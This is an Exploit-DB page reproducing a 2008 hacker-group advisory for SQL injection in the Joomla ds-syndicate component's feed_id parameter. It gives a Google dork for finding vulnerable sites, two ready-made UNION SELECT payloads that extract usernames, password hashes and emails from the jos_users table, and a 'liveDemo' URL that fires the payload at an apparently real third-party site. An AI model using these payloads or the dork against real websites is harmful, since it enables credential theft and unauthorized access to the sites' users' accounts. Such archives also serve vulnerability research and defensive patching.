Joomla! Component ds-syndicate - 'feed_id' SQL Injection

EDB-ID:

6792




Platform:

PHP

Date:

2008-10-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

#############################################
#Joomla com_ds-syndicate Sql-injetion vulnerability #
#############################################
#[~] Author :  boom3rang 
#[~] HomePage: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
#[~] Kosova Hackers Group 

#[!] Component_Name:  ds-syndicate
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_ds-syndicate"
#############################################


#[~] Exp:           http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]

#[~] Exploit [1]:        1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--    

#[~] Exploit [2]:    
 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  

#[!] Note:
If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).

#[~] liveDemo: 
http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

ps. here in this liveDemo you need to download file  =feed1= .

#############################################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#############################################


# milw0rm.com [2008-10-20]